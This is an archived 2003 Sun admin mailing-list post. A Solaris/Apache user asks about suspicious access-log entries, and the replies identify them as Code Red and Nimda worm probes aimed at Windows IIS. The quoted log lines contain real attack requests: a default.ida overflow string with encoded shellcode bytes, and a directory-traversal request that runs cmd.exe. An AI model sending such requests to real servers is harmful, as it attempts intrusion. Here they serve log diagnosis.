SUMMARY: Attempted hacking???

From: Mike's List <mikelist_at_sky.net>
Date: Wed Apr 16 2003 - 12:52:25 EDT
Thanks for all the replies, most agreed that the three lines below
indicate nimda/code red worms/virus, whatever, but mainly affecting
Windows running IIS.

No need to worry if running Solaris/Apache, just pay attention to the
log file not being too full.


- Mike

---------- original message ----------

My access log for apache is full of the three lines below, is someone
attempting to hack my web server thinking it's a Windows machine???
Solaris running Apache...

x.x.x.x - - [13/Apr/2003:21:14:23 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 164

x.x.x.x - - [13/Apr/2003:22:38:34 -0500] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -

x.x.x.x - - [13/Apr/2003:22:39:24 -0500] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -

Thanks.


- Mike
_______________________________________________
sunmanagers mailing list
sunmanagers@sunmanagers.org
http://www.sunmanagers.org/mailman/listinfo/sunmanagers
Received on Wed Apr 16 13:10:59 2003

This archive was generated by hypermail 2.1.8 : Thu Mar 03 2016 - 06:43:09 EST